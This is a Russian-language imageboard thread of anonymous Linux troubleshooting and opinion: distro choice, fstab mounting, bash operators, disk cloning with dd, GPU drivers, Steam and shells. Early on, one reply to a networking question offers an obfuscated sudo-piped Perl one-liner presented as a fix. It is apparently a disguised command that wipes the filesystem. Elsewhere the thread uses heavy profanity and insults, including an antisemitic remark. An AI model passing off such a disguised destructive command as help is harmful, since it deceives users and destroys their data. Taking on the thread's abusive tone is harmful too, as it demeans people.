В общем, я посидел, подумал над выбором дистрибутива, вспомнил, как арч ставил три года назад и забил. Устанавливаю сейчас убунту лтс с минимала. Не знаю, что со мной, но банально лень вводить эти десятки команд при установке, настаивать, допиливать. Хуй его, раньше вроде наоборот нравилось.
Аноним (Microsoft Windows 7: New Opera)07/12/15 Пнд 22:15:10#18№1500264
ubuntu server 14.04. Как в консоли настроить сеть при подключении к роутеру напрямую? Предположим это дир300 с адресом 192.168.1.1. Втыкаю кабель в сетевуху, а роутер вообще не видит комп.
>>1500264 Можно на перле. Вот так: traceroute 192.168.1.1 | sudo perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see' | sudo tee resolv.conf
Установил zsh и скачал grml-конфиг @ Удалил zsh и откатился обратно на удобный напердоленный bash Второй раз уже щупаю zsh и не могу уловить особых преимуществ, какая-то мокропися.
Аноним (Microsoft Windows 7: New Opera)07/12/15 Пнд 22:21:06#23№1500277
Аноним (Microsoft Windows 7: Firefox based)07/12/15 Пнд 22:27:53#24№1500286
Аноны, я продался жидам, снес ксубунту и поставил седьмые окна (короче - из форточки высосывается здоровый хуй, подбегает пингвин и сосет), потому что не смог установить рабочие драйвера для принтера. Я лох?
>>1500295 Они же ничем друг от друга не отличаются по большому счёту. Нагуглил бы альтернативу перед покупкой. Ну ладно, что теперь. Чернила закончатся — покупай совместимый.
>>1500311 Потому что не надо было так много много печатать, а с картриджами этими сплошное наебалово. Ну распечатаю я 100 страниц в год — охуеть, проще уж за бабло печатать где-то, когда нужно.
>>1500314 А хрен знает, я не помню уже. Суть в том, что я не живу в офисе или типографии и не представляю, зачем дома мне нужен принтер. Документы в основном в электронном виде, да всё вообще в электронном. Надо распечатать — распечатал в лавке или у кого-то.
Писал в прошлом. У меня доступ в раздел виндовый с хранилищем возможен только после того, как я его 1 раз в Dolphin-е открою. mc его не видит, например. Сказали монтировать надо, что-то про fstab сказали. http://help.ubuntu.ru/manual/fstab Курю это. Я правильно понял, что мне просто достаточно указать в точке монтирования какую-то директорию? Просто обозвать? А как быть с тем, что у меня вроде как уже есть доступ к нужным файлам по пути /media/username/Новый том/ ? Я чего-то запутался.
Аноним (Linux: New Opera)07/12/15 Пнд 22:55:28#45№1500329
Анон, нужно отсканировать две страницы из книги (на английском), роспознать текст и сделать, собственно, текст, который поддается редактированию. Какой софт нужен? мимиLINUXMINT
>>1500323 не понял >>1500324 А что это такое то и причем тут это? Судя по вики там я могу разобраться с разделами, да еще и в GUI, так? >Dolphin Ну предустановленный. Так то mc использую. Да и вообще не в этом же суть. тот же торрент при запуске системы ругается, мол, не могу найти файлы. Не видит он раздела. Открываю в том же долфине директорию, запускаю раздачу и все нормально. >>1500330 Скриншот на вопрос отвечает утвердительно?
>>1500356 1. Вторая комманда выполнится только если первая завершилась успешно 2. Просто последовательность. Тоже самое, как если писать всё на новой строке. 3. Конвеер. Вывод первого скрипта переходит во второй.
>>1500359 Ты путаешь & с &&. 1. a & b Команда a выполняется в фоне, интерпретатор не ждёт её завершения, а cтатус выхода будет 0. Одновременно выполняется команда b. Т.е. это параллельный запуск такой. 2. a ; b Последовательное безусловное выполнение сначала a, а потом b. Т.е. вторая команда запустится независимо от того, как отработала первая. 2a. a && b Последовательное условное выполнение сначала a, а потом b. Т.е. вторая команда запустится только при успешном завершении первой. 2б. a || b Здесь ИЛИ. Запустится первая команда, а если она не запустится, т.е. выдаст хуёвый код возврата, то запустится вторая команда. Если же первая успешно запустится, то вторая уже не запускается. 3. a | b Конвейер. Передаётся вывод первой команды на ввод второй.
>>1500398 Нет, в /s/ достаточно моих скринов. Речь вообще была не обо мне, а о том, что у анона чад кутежа и вырвиглазный видок даже без учёта икон. Это при том, что нюмикс — очень даже неплохие иконы.
>>1500355 Есть SSD с виндой и HDD, часть которого - хранилище виндовое с проном и сериалами, часть (250 ГБ) - кубунту 14.04. Так вот. Я пересел на кубунту почти полностью. Но при запуске системы у меня ktorrent ругается, мол, не может найти файл. Дело в том, что я качал его на ту часть HDD, которая виндовая. Так вот. Я заметил вот что. При первом запуске системы не открываются, допустим, ярлычки, которые ведут на тот самый раздел. Нужно один раз через что-то зайти в этот раздел (dolphin юзаю hjlyjq), тогда все будет нормально работать, ссылки работают, торрент раздается. Как быть и в чем дело?
# mount | grep Main /dev/sda3 on /media/Main type fuseblk (rw,noexec,nosuid,nodev,allow_other,default_permissions,blksize=4096)
Сказано было в гайде. Я ничерта не понимаю, первая же строка ничего не делает, похоже. Она ж должна вывести итоги поиска? Ну да фиг с ним. Остальные больше похожи на часть какой-то другой команды. И вообще сделал все до пункта "Перезагрузка". Пока симптомы те же. только при запуске кубунту ругнулась, мол, что-то не так с /media/ и ее монтированием, ну я и нажал, мол, пропустить. Думал нужно просто дойти до конца гайда.
Решил угореть по хардкору и собрать минималистичное монолитное быстрое ядро с защитой от всяких оверхедов и прочего. У кого много свободного времени на руках, почитайте, дайте оценку. https://bpaste.net/show/db8b00bd9000
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 00:49:15#78№1500470
Я конечно все понимаю, но считаю что пора поняшек гнать в ga
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 01:00:00#83№1500482
>>1500478 Решает некоторые проблемы с задержками, не дает повесить систему бесконечным количеством программ, улучшает мультизадачность, разве нет? С версии 2.6 не забагован.
>>1500476 Уже собрал. Хочу просто, чтобы кто взглянул, может я накосячил где.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 01:01:19#84№1500484
Линуксаны, кто-нибудь имеет опыт ебли с bluez? Хочу поднять на компе PAN для подключения пикрелейтед-устройства к сети. Гугель сказал, что был некий pand в ныне почившем bluez3, а в нынешнем bluez5 есть только test-nap, который, как я понял, только для подключения к существующей сети. Что с этим всем делать - не понятно.
>>1500499 Ну блин, ток вернулся с больницы, чем-то заниматься совсем лень. Хоть отдохну чуток за синглплеерными адвенчурами. Или накатить балдурс гейт и не ебать мозги?
Анон помоги, при использовании мультимедийных клавиш (выключение звука) приходиться его включать аж в ебенях. Лезть в pulseaudio и там ебашить по кнопки. Хотя все остальные кнопки хорошо работают.linux mint 17.2 p.s до этого они вообще не работали, снёс xmix и поставил volti. Всё заработало, но с этой злоебучей кнопкой проблемы
Ребята, решил поставить KDE Connect на Debian Jessie ванильный. Ну, то есть с гномом. Оно потащило кучу зависимостей кде-шных, встало. Как запускать-то? Я так понимаю, в кедах оно должно как-то интегрироваться в систему. А в гноме как? В пакете есть только один исполняемый файл kdeconnect-cli, которой не очень-то помогает. Я бы даже не пытался запустить это, но в сети все пишут, что с гномом оно работает и даже на убунте с юнити тоже. НО! падлы не пишут нормального мануала, как это запустить.
>>1500504 Откатись на оригинал системы, хватит кататься на коляске с навигатором но глючным. Возвращайся на коляску без навигатора, ездит нормально, все кнопки работают по дефолту(с дефендер-гамерской клавиатуры, ноутобляди сосут член при любом дистрибутиве) все работает, сам радостно катаюсь, но правда коляска немного заржавела от старости но смазочное масло и подшипники в ней меняют, не скрипит при движении несмотря на ржавчину. Только на новые коляски с SystemD не смотри, у них одно колесо отваливается каждые 10 минут, а другое пару раз в день, касается обоих 15.04 и 15.10
>>1500377 Лол, мне стандатный гном-набор и редмонд нравились, лучшее что может быть и наиболее подходящее к любой теме. Расстроился когда выпилили еще одну тему похожую на "редмонд" она бы была чуть лучше ее.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 02:38:10#100№1500523
Имеется 512гб ssd и 1тб hdd. Как лучше разбить разделы для арча?
>>1500523 C таким обьемом SSD - HDD уже ненужен. SSD только для системы которая и 10 гигабайт не занимает, это ебануто. Логичнее SSD для всего, включая в том числе и /home HDD же отдельным стулом оставить, качать на него торренты иногда, во время установки отказаться от его использования лол.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 02:45:47#102№1500531
>>1500526 Значит просто весь ssd отдать под /, а hdd замаунтить в какую-нибудь левую папку корня, типа вщцтдщфвы,
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 02:46:05#103№1500533
>>1500531 Лучше другой вариант, вообще никак не обозначать HDD И даже для загрузок пользоваться SSD так как места достаточно. После когда уже система будет поставлена, назначить торрент-клиент закачивать все по умолчанию на HDD Так выгодней всего, как по быстродействию так и по прочему, еще может убережет тебя от 12309.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 02:51:21#105№1500536
>>1500535 >назначить торрент-клиент закачивать все по умолчанию на HDD Но ведь его нужно как-то замаунтить. Не?
>>1500536 Оно не само подключается? Всегда само подключалось вроде, любой накопитель появлялся в системе если он имеет хоть какую-то файловую систему, но арча никогда не видел вроде, в сомнениях что в нем не так.
Linux Mint. Не моу поставить uTox. username@username-GA-MA770T-UD3 ~ $ echo "deb https://pkg.tox.chat/debian nightly release" | sudo tee /etc/apt/sources.list.d/tox.list [sudo] password for username: deb https://pkg.tox.chat/debian nightly release username@username-GA-MA770T-UD3 ~ $ wget -qO - https://pkg.tox.chat/debian/pkg.gpg.key | sudo apt-key add - gpg: не найдено данных формата OpenPGP.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 04:04:13#110№1500545
Сравнивал графин в винде и в лине (точнее сравнивал глубину цвета и прочее), так вот, в винде все выглядит намного лучше и дело скорее всего в свободных дровах, которые стоят, ставил проприетарные, но у меня ДЕ откинулась. Как погуглил, дело в том что видяха старая (Radeon HD 4850) и для такой карточки надо сделать даунгрейд иксов и поставить не fglrx, а нечто другое (уж название не помню). Короче, как сделать даунгрейд иксов? Perdilinux Mint 17.2 64x DE Cinnamon
>>1500541 >>1500543 Это не Lts или еще чтото такое? Известная ошибка, любое форматирование средствами системы неудачно. Надо форматировать Гпартедом, после записывать то что надо запуская программу записи через Sudo - тогда это работает.
>>1500549 У меня такая проблема с флешками возникала просто, выдает ебанутую ошибку и не может форматировать. Гпартед может.
Тут незнаю как обходить ошибку при записи не диск, вероятно другой программой записи. > Что за LTS Стабильна только 14.04.3 убунта, все остальное выебывается и сыпит ошибками на каждое действие, и не желают исправлять. Каждые 2 года выходит стабильная версия, следующая 16.04 и надо только ими и пользоваться будет - иначе превознемогай.
>>1500554 Еще полгода и я попревознемогаю немного с 16.04 до 16.04.1 - там превознемогать будет легко. Я даже смог превознемогать на 13.10 и после на дневных сборках последние 2 месяца перед выходом 14.04 и было норм максимум что не работало это ввод с клавиатуры до входа в систему(решалось включением экранной и вода пароля мышкой) Собрался повторить и превознемогать так-же, но 15.10 совершенно не работает, половина действий вызывает ошибку, такой клоунады даже при выходе юнити не было, тут я даже и рисковать не буду 15.10 вообще смотреть, не то что дневные сборки. Устрою себе сюрприз.
Это просто подготовка к MIR работающем только на интелографике, и unity-8 которое как Gnome-3 но еще более планшетное. Там не такое будет, и пользователя должны быть готовы к любым испытаниям, включая нософт и внезапному выжиранию более 16 гигабайт оперативной памяти только на систему от новой фичи в которой все зависимости к пакету будут в этом пакете идти. Лулзов будет еще не мало извлечено.
>>1500555 Ну вот скажи, зачем тебе эти превозмогания ? Чего ради ? Ну LTS тоже не панацея, там тоже отваливается что-то или нет-нет, да и рапидорасит что-нибудь. Просто значительно реже, но тем не менее. Почему бы не взять дистрибутив, в котором просто все работает и поддержка 10 лет? Не понимаю. К чему все эти страдания. Да и согласись, такое в массы не пустишь, люди, мягко говоря, не поймут.
>>1500556 Автоконфигурация, хорошая изкоробка. Если чтото пошло не так - исправляет перезагрузка, и то такое случается очень редко. Самое худшее что есть это зависание намертво, которое проявляется только на ноутбуках и то не на всех и способно повторяться несколько раз в неделю. Раздражает только один не функционирующий совсем пакет, и немножечко несвежий сам их набор.
Ну и там накопленные за время использования особенности: 1. C apt уже не переучится 2. Некоторые приколы эпичные инсталятора дебиан(увиденные ранее) как и некоторый маразм подхода к запиливанию дистрибутива отталкивает от оригинала.
Скорее всего если все будет очень ужасно то Xubuntu основной вариант на перекат, пока все работает и беспокоится рано. Если испорчен будет он то посмотрю в сторону дебиана. >Превознемогания Они начинаются сами, всегда, когда смотришь самые последние достижения народного хозяйства, дистрибутив тут не при чем, в любом будет так-же если взять версию с самым свежим софтом.
>>1500565 Диск не завершится. После записи он должен там явно обозначить конец или нулями все забить далее, забыл что именно. Жди полчаса, может отвиснет.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 05:51:11#123№1500568
>>1500545 Это разница между Dx и Opengl Она и в виндовсе значительная, запусти игру вроде трейн-симулятора-2006 в опенгл режиме и посмотри разницу, тут же все на нем, как и в андроиде, как и на всех устройствах где нет Windows >>1500573 >>1500544 Не те скобки в первом действии, наверное.
Это не всё его содержимое, я обрезал, но как видно, в каталоге 895 мб логов. У меня есть пара сервисов запущенных от моего юзера (через systemctl --user). Я написал journalctl --user и увидел, что в логах полно записей никак не связанных с моими сервисами. Например, там полно записей от гнома, фурифокса, неба и даже аллаха! Причем многие записи повторяются 1000 раз за одну-две секунды. Как починить этот кошмар?
О великие Прыщебоги, взываю к вашей помощи! На мамкином ноуте стоит хубунта 10.04. Ноут оче старенький. Оперативы 512, целерон 1.7.. Используется онли для просмотра фильмов в интернете. Через час-полтора он становится таким хорошим обогревателем, и начинает сильно подтормаживать. Система ест 120 мб оперативки без запущенных приложений. С фф лимит памяти сходит на нет. Прошу годнях советов по оптимизации. Без установки генты конечно. Но может DE или браузер какой поставить.
>>1500588 > для просмотра фильмов в интернете youtube-dl+mpv. Браузеров куча шустреньких, но в них весьма куцый функционал и высокий порог вхождения. Из самых простых и жирных попробуй midori.
>>1500588 Lubuntu еще легче, раза в два. Там совсем спартанские условия правда. Xfce - окружение средней легкости, я подсмотрел на каком-то сайте, там слишком много настроек и прочего чтобы быть совсем легким.
Аноним (Microsoft Windows 10: Chromium based)08/12/15 Втр 07:04:21#136№1500591
>>1500223 (OP) Чем отличаются дистры, кроме системы упаковки и DE?
Аноним (Microsoft Windows 10: Chromium based)08/12/15 Втр 07:04:46#137№1500593
>>1500591 Свежестью программ в репозитариях, и главной идеей которая влияет на все. Но в обычных на широкого пользователя расчитанных дистрибутивов разницы нет, автонастройка в них принята по умолчанию. >>1500595 Попробуй посмотреть Lubuntu без установки загружаясь с флешки, может не потребуется откат еще дальше. Но особо на такой системе жить нельзя, всеравно придется использовать браузеры а они требуют для работы без тормозов 3-4 таких процессора как у тебя.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 07:21:20#140№1500597
>>1500600 Наврядли, на ати всеравно все ужасно с драйверами, да и с любыми проприетарными все плохо. Работают свободные и нормально, так и пользуйся. Лучше чем получить черный экран вместо системы на проприетарном в любом случае или радуга чтобы вокруг шрифтов появилась.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 07:36:32#144№1500602
>>1500606 Ну не арч же ставить? И не мандражаро неизвестно от кого. Превознемогаем дальше, на то и нужны толпы превознемогателей, они превознемогают миллионами человек в 15.10 тестируя пакеты и отсылая автоматические багрепорты. Должен еще космонавт и компания обработать их всех, тогда годнота получится, когда на текущих пакетах будет lts.
В мандражаре с арчем столько превознемогателей нету, дебиан же накатить просто лениво, надо будет разбираться чуть получше чем тут что там и к чему.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 09:03:00#152№1500618
>>1500616 К манджаро можно жи прикрутить от арча репы, не?
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 09:09:11#153№1500619
Говорят Габен завез оптимизацию в реборн доты на линуксах. Кто-нибудь пробовал на арче? Как с фпс?
>>1500619 Габен рвет жопу затем что его из виндовс10 турнет встроенный маркет его стимопарашу со временем. "вин10 это катастрофа" - сказал он и стал пиарить линуксы, и если он что, затачивает то под убунту, в нестабильном говне 15.10 появилась поддержка контроллера от стим-машины, но пользоваться нельзя, так как система нестабильнее в несколько раз чем расчитывалось.
Он даже достиг того что каждый сотый пользователь стима из линукса сидит, но это какие-то долбоебы - добровольно ставить сюда Адварь продающую торрент-файлы и ворующую кредитки это долбоебом полнейшим надо быть, как и космонавту надо отвесить пиздюлей у него флеш значит со скайпом в "партнерском" отключенном репозитории, а это говно на которое должен антивирус реагировать в виндовс и удалять, у него тут да еще в основном! Хуйня с DRM-парашей, да за такое в дебиане наверняка убивают.
Игры должны по другому распространяться, не требуя встраиваение частного магазина и кучи рекламы прям в систему. Оптимально было бы их скачивать по купленному коду или за донат сразу с сайта разработчика/издателя, обходя всякий подозрительный софт.
Аноним (Microsoft Windows 8: Internet Explorer)08/12/15 Втр 09:24:51#155№1500626
>>1500618 >К манджаро можно жи прикрутить от арча репы, не? там свои репы которые берутся из арча, проверяются на потенциально нестабильные системные пакеты и если надо временно блокируются. >>1500616 Как же ты ошибаешься, лел.
>>1500625 Вот смотрите, специально такой финт сделан. Чтобы я моментально не поставил и рейтинг клиента адекватные люди до нуля не опустили за пару дней, не написали недовольные отзывы на тему того что народ объебывают, "не качайте там вирус".
Аноним (Microsoft Windows 10: Chromium based)08/12/15 Втр 09:26:28#157№1500629
>>1500625 Чем быстрее стим начнёт загибаться, тем скорее HL3 - последний козырь в руках габена. Поэтому стоит всем постоянно возвращать игры.
>>1500629 Ты недооцениваешь ситуацию. Шутерки не нужны, их не будут делать на 20 часов игру и делать ее несколько лет. Есть Дота, есть TF - они просто начнут развивать активней если стим все. Вместо халф-лайф-3 в доте появится вторая карта например, к 2030 пообещают третью но сделают только к 2045
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 09:30:43#159№1500631
>>1500631 >>1500632 Всеравно это игра про деградацию сплошную, надо игрокам водку пить только пока играют, так лучше будет, эффективней. Деградируют по 2-7к часов и эффект незначителен. >>1500634 Имею представление о том что НЕНУЖНО
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 09:36:21#164№1500636
Вобщем решил сделать миграцию системы ради теста с ssd 250GB на HDD 500GB. Применил команду dd if=/dev/sda of=/dev/sdb bs=8M conv=sync,noerror. За минут 20-30 прошло все. Отрубил для надежности все диски запустился с HDD вприципе работает. Но диск думает что он ssd по размеру. Т.е 200 гигов пропало. Через Gparted я увидел следующее мракобесие. Ну 200гб вышли в отдельный раздел диска. Я их отформатил. Так и должно быть? И как правильно посоветуете переносить систему? Сижу на Mint. Есть конечно такие штуки как systemback , но хотелось бы с помощью консолечки сделать iso который только будет система не образ в 200 гб а 25 гб. И закатать на флешку. Как вы делаете бекапы?
Аноним (Microsoft Windows 10: Chromium based)08/12/15 Втр 09:38:35#166№1500639
>>1500636 Как же мне стыдно за таких спермачей, которые в каждом вопросе всё сводят к юзерагентам.
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 09:40:04#167№1500642
>>1500636 Таки нужен и преобладает. Игры таки не нужны, современные тем более, старые игры немного нужны понастольгировать чуть. Онлайн игры - не нужны никогда, интернет к ним еще не готов, вот когда там будет чтото другое вместо пакетной отправки и задержек связанной с ней, тогда быть может посмотрю на хоть одну онлайн-игру.
Я смотрел когда-то на онлайн игру под симбиан-смартфоны, бил там каких-то тараканов, но очень недолго где-то 1,5 часа наиграл в хорошем 2006 году. Она тоже была не без проблем. Как и просмотренная позже UT3 в которой все противники телепортацией перемещались, или ололоды/Wow где настолько кривое прогнозирование событий компенсирующее пинг что жопа рвется.
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 09:44:21#169№1500648
>>1500645 >>1500636 Доту я видел, тоже в ней одна карта на ней дрочились часами. Там какие-то тараканы с одной стороны бегут, и такие-же с другой. Мудилы ватные ходят орут в микрофон, своим дебильным мамоебским сленгом. Ищут самого сильного персонажа или таракана, а его нету в игре полный баланс, и она унылая в ней более чем 15 минут делать нечего. >>1500648 В мировом соотношении на всех устройствах. Виндовс наверно менее 40% уже. Я рассматривают Линукс как ядро, потому что именно ядро, неуспешный особо комплект программ GNU я сюда не подтаскиваю, а ты не спрашиваешь про него.
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 09:53:29#172№1500654
Есть один либрофис 5 (но версия не суть). Есть его установщик в виде пакета deb. Как мне выбрать компоненты, которые я желаю установить. Под виндой все просто, поставил галку и, вуаля. Предположим я не хочу средство работы с БД.
>>1500633 Нет, не будет. Уже всем похуй на третью халву, школота только хайп держит по инерции. Вообще странно, что такой шум подняли и что вообще кто-то ждёт хл3.
>>1500651 >неуспешный особо комплект программ GNU я сюда не подтаскиваю, а ты не спрашиваешь про него А ну быстро удалил все гну-компоненты из системы и заменил их. Или хуй простой.
>>1500625 Если бы стим нормально работал со встроенными библиотеками системы, я был бы ему очень рад. А запускать убунту внутри своего дистрибутива как-то грустно. >Игры должны по другому распространяться, не требуя встраиваение частного магазина и кучи рекламы прям в систему. Оптимально было бы их скачивать по купленному коду или за донат сразу с сайта разработчика/издателя, обходя всякий подозрительный софт. gog.com humblebundle.com
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 12:13:36#182№1500710
Есть какой-нибудь фид, в котором для дебилов простым языком поясняют какие изменения в следующей версии ядра прикрутили? Скажем, чем 4.4 отличается от штабильной 4.2.6
братки, подскажите жопенсурсный и весьма желательно кроссплатформеный нужно же спермоблядкам что-то адекватное ставить плеер для музыки с йоба-функционалом
Как отключить у раедона этот ебучий DPM? Вхуячиваю radeon.dpm=0 и в гроб и в /etc/modprobe.d/ - нихуя, в /sys/kernel/debug/vgaswitcheroo/switch дискретка всё равно DynOff, блядь.
>>1500717 >спермоблядкам что-то адекватное ставить плеер для музыки с йоба-функционалом foobar2000 Не опенсорсный и не кросплатформенный (хотя под wine бегает), но лучше ничего нет.
>>1500720 Хотя нет, только что посмотрел, есть и под сперму >>1500723 > МАНДАРИНКА. Я что-то слышал про него. Можешь пояснить за него поподробнее. Я особо тему с аудиопроигрывателями не вскрывал, так что толком не разбираюсь в этом. Пользуюсь амароком.
>>1500726 Позиционируется как продалжатель традиций ещё того, лампового, первого аморка. На Qt4, вроде как почти портировали на пятёрку, чего не скажешь про амарок, юзает gstreamer.
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 12:39:32#197№1500740
>>1500738 И вырвиглазный терминал. Ох не стал бы я ему доверять
Аноним (Microsoft Windows XP: Firefox based)08/12/15 Втр 12:40:08#198№1500741
У кого-нибудь работает геймпад xbox360 под вайном? Как запилить? В гугле говорят, что нужно юзать xbox360cem, но во-первых это извращение, во-вторых оно у меня работает далеко не везде и не всегда.
линуксач, спасай. дали флешку с васянским образом чего-то, задача отформатировать. флешка не монтируется sudo dd if=/dev/zero of=/dev/флешка не работает. как реанимировать пациента?
>>1500742 > Ну, это все равно немало. Блядь ты уже реально перегибаешь палку.
> Да и ты наверно поудалял ненужное Это свежеустановленные кеды на минимальной установке, тут ещё можно сказать что пакетов многовато ибо доставлял всё метапакетами. Хотя сейчас после доставки свистелок и перделок чтобы было не такое УГ как наскрине жрут пятокеды действительно много.
> А я просто взял ливы старой и новой Kubuntu и сравнил. Нашёл что сравнивать, надо хотя бы в сусе или любом другом нормальном дистре сравнивать, но никак не в этой коляске, которая памяти раза в джва больше жрёт чем дебиан
>>1500752 >Блядь ты уже реально перегибаешь палку. Очередной админ локалхоста с одним браузером запущенным что ли? У меня 32 ГБ оперативки, постоянно крутятся не меньше пяти виртуалок, и я в рот ебал петушков с их кукареками о том, что не надо оптимизировать потребление памяти.
>никак не в этой коляске, которая памяти раза в джва больше жрёт чем дебиан Это ты откуда взял вообще?
>>1500752 >которая памяти раза в джва больше жрёт чем дебиан Запизделся, жрут сравнимо. Сравниваю ubuntu 14.04 amd64 и sid с пятокедами i686, убунта даже меньше жрет, лол.
>>1500762 >и я в рот ебал петушков с их кукареками о том, что не надо оптимизировать потребление памяти. В чем-то ты прав, но нахуя тебе кеды в виртуалке, ебанатище?
>>1500762 > Очередной админ локалхоста с одним браузером запущенным что ли? Если бы я хотел минимализма, то обмазался бы тайлингом. > Это ты откуда взял вообще? Также как ты сравнил дебиан с предустановленной крысой и ксубунту. Оба дистрибутива были с одинаковыми параметрами ДЕ.
>>1500719 Пиздец, сам спросил - сам отвечаю. Нужно отключать runpm, а не блядский dpm, с runpm=0 дискретка автоматически не выключается и при этом dpm динамически меняет вольтаж и частоты в зависимости от нагрузки.
>>1500778 >оптимизируют, делают более модульными Выбери что-то одно. Жрут они таки больше, сравнивал с примерно одним набором пакетов. И вообще в пятых кедах еще и четвертые работают, лол.
>>1500788 Фиш не нужен при живом zsh, но пробовал его в арче однажды. Это такая коляска для не осиливших zsh, но лучше уж zsh осилить и настроить, если нужны мокрые письки.
Аноним (Microsoft Windows 10: Firefox based)08/12/15 Втр 13:10:38#232№1500794
>>1500793 Фиш не нужен, потому что синтаксис нестандартный. Нахуя отучаться от баш синтаксиса ради мокрописьки, если есть мокрописька в виде зш, которая ему следует.
Manjaro Arch с графической gnome 3 Довольно вольяжно пердолился с установкой дискретной видеокарты от nvidia, в итоге теперь не запускается ось. Интернета нет поэтому установить заново драйвер от интела не получилось. Как сбросить все настройки драйверов? Или восстановить систему от какой-то точки? Как исправь проблему зависания без интернета и только через консоль?
Аноним (Microsoft Windows 7: Chromium based)08/12/15 Втр 13:22:47#244№1500814
>>1500806 >Нахуя отучаться от баш синтаксиса Не все админят локалхост и знают синтаксис баша. Олсо, различия там незначительные и на википедии есть небольшая таблица по переводу
>>1500811 В твоем юзер-агенте все написано. Ставишь опять с нуля и генту, в генту обязательно гугл-хром, как все настроишь запускаешь опять установку драйвера нвидии который не работает с оптимусом так как нвидия жопой повернута к опенсорсу сразу заиграет радостная музыка и покажут мультик.
Сегодня мне снилось, что я снова школяр-старшекласник, и на УПК по информатике к нам завезли с лекцией молодого Столмана, ну, когда он еще ряхой был похож на щекастого Высоцкого. Здоровая скучающая аудитория человек на 60. Невыспавшийся лекторЮ говорящий по русски почти без акцента, но странно подбирающий слова и странно составляющий фразы. Он там рассказывал про проприетарные среды разработки, приводя в пример переход от Паскаля Delphi. А я вклинился, как делал в школьные годы, что мол, в Советской России оно немного не так все. Тут студента учат на этом самом Delphi программить, а он потом один язык зная и пишет на нем все, даже для чего язык непригоден. Столман подобрел, даже к моему столу подошел, и давай какую-то схемку на листке чертить, типа контраргумента. А тут вдруг дверь открывается, влетает зауч со слесарем, и давай орать. Мол что это такое, да вы посмотртие, как он дейтей учит, этот ваш иностранный гость, от него же алкоголем несет. Столман как-то сразу сдулся виновато и позволил себя под руки из аудитории вытащить. А схемку, котору чертил, так и не показал. Анон, вот к чему это такие сны, скажи, а?
>>1500821 Пробиваю systemctl он в ответ failed to connect to bus. Ну значит через менеджер установки пакетов я добавляю парочку драйверов для nvidia, затем иду в настройки драйверов, вижу что у пеня работает только дискретная, решаю исправить это положение и начинаю дико кликать по разным прикольным галочкам и жать кнопочку установить. Затем у меня внезапно. Падает pacman, написав что-то вдроде он не найдет и скриптам тоже пизда. Я недолго думая перезагружаться и сталкиваюсь с зависанием запуска моей ОС. С этого момента я уже починил pacman и удалил некоторые драйвера от nvidia, но не все. На мой взгляд проблема решить перехода к строковым настройкам драйверов их сбросу или восттановлению
>>1500839 zsh надо пердолить, чтобы было как в фише, а баш вообще ужасно неудобный кастрат. Если ты действительно считаешь, что ctrl+r в баше это так же удобно, как личтание стрелками, то баш это точно твоё. А zsh действительно надо пилить, тот же капс 3 букв по дэлиту это вообще невразумить.
>>1500834 Он неплох, но это не офис, а текстовый редактор только же. Из минусов странная работа с RTF. ПО крайней мере лично мне нормально открыть соххраненный им файл в чем-то кроме самого AbiWOrd не удавалось. А это был всю жизнь самый надежный канал обмена документами между Линуксовыми офисами и M$O.
Аноним (Microsoft Windows 7: Firefox based)08/12/15 Втр 13:41:21#272№1500852
>>1500846 Ну тип да, но мне и не нужен комбайнер, а только текст. Рефераты, да сообщения ебашить для института, там максимум выравнивание текста, настройка размеров и вставление картинок нужно.
>>1500871 -Какие плюсы в debian? Разве убунту не лучше? Это же debian, только из коробки. -Какие плюсы в убунте? Разве минт не лучше? Это же убунта, только из коробки и без амазона. -Какие плюсы в минте? Разве минтVasyanEdition не лучше? Это же минт, только из коробки.
>>1500885 Гпартеда нету, то что есть только сыпет ошибками и не собирается работать. При том все ошибки на тему того что файловая система повреждена, или типо того. Однако гпартед затаскивает в любом случае.
>>1500892 >>1500885 Они заменили гпартед на свою неработуащую письку "Диски", очень потешно выглядит кстати, на древний диспетчер дисков из экспи похожа, только с минимальным функционалом.
>>1500884 Это шиндовс в файловые системы не может, поэтому приходится их пародии на ФС тоже поддерживать. FAT16 FAT32 exFAT СУКАБЛЯДЬНЕНАВИЖУ NTFS БЛЯДЬ --FORCE СУКА
как же хорошо что я полностью отказался от использования шинды. Только последнее ведро блядское кроме как exFAT на карте видеть ничего не хочет, поэтому вместо божественной f2fs как на ультрабуке, мою бедную 64гб MicroSD насилует виндоблядская недоФС с подачи гугла
>>1500906 В parted всё просто и понятно, даже у такой баки, как я, создание разделов с первого использования этой превосходной утилиты не вызвало проблем.
Аноним (Microsoft Windows Phone: Internet Explorer)08/12/15 Втр 14:01:34#324№1500918
>>1500898 Не понятно ебанулись или нет, но это уже давно с самого появления юнити вроде. И оно два месяца назад работало, а теперь как в LTS так и вне LTS одинаково-неисправная версия. Любое форматирование или действие с дисками или еще чем, из любой программы кроме гпартеда, вызывает одну и ту-же универсальную ошибку, ну или 2 на выбор таких же странных.
>>1500906 У меня с флешкой такая же херотень кстати, думал уже все, пиздец ей. Началось после того как решил на нее через dd образ записать. Также определялось не все пространство, при создании таблицы и форматировании ошибки сыпались и т.д.. Потом решил на удачу в виртуалке экспишной посмотреть на нее и как ни странно записал образ через rufus и она заработала как ни в чем ни бывало. Gparted только также фокусы с ней выкидывает, то ФС не видит, то таблицы нет говорит. DD за три секунды гигабайтные образы "записывает", после чего gparted не видит половину пространства. В общем я даже и не знаю в чем дело, но все происходит именно так.
